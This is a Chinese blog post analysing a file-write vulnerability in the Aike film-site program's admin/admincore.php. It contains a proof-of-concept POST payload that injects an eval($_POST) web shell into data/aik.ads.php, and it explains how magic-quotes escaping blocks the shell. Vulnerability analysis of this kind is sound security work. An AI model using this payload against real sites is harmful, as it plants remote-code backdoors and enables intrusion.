首页 > 技术文章 > 爱客影视 程序存在文件写入漏洞 分析

ms016 2017-10-30 17:37 原文

此程序漏洞不是我审计的 所以我简单分析一下

 

漏洞比较鸡柱

 

审计的程序是最新版

 

因为此程序都是调用官网的接口 自动采集

 

所以不会调用 数据库

 

漏洞文件 admin\admincore.php

POC

Get  /admin/admincore.php?act=ads

POST edit=1&ads=fsad';@eval($_POST[1]);//

file_put_contents() 看到此函数 程序接受数据的时候 程序会在

data 目录下生成一个固定的文件 aik.ads.php

data/aik.ads.php

利用方式

 

 

对admincore.php 页面 提交POST 参数

 

在看下写入的文件里面的内容

 

 

其实这一句话是没有执行的

 

为什么没有执行呢

 

看一下 提交的信息edit=1&ads=fsad';@eval($_POST[1]);//

 

fsad';@eval($_POST[1]);// 这段内容才是我们提交的内容

fsad 是定义个变量名 单引号 是 闭合 前面程序自动生成的单引号

所以是  因为我们提交的一个单引号 被 转义了 成了 \  反斜杠

所以导致一句话无法执行

get_magic_quotes_gpc()

在漏洞文件里面看到了此函数

 

 

所以 有时候真的很无奈

 

把反斜杠 去掉

一句话执行了

Fsad变量把内容赋值给ads变量

 

推荐阅读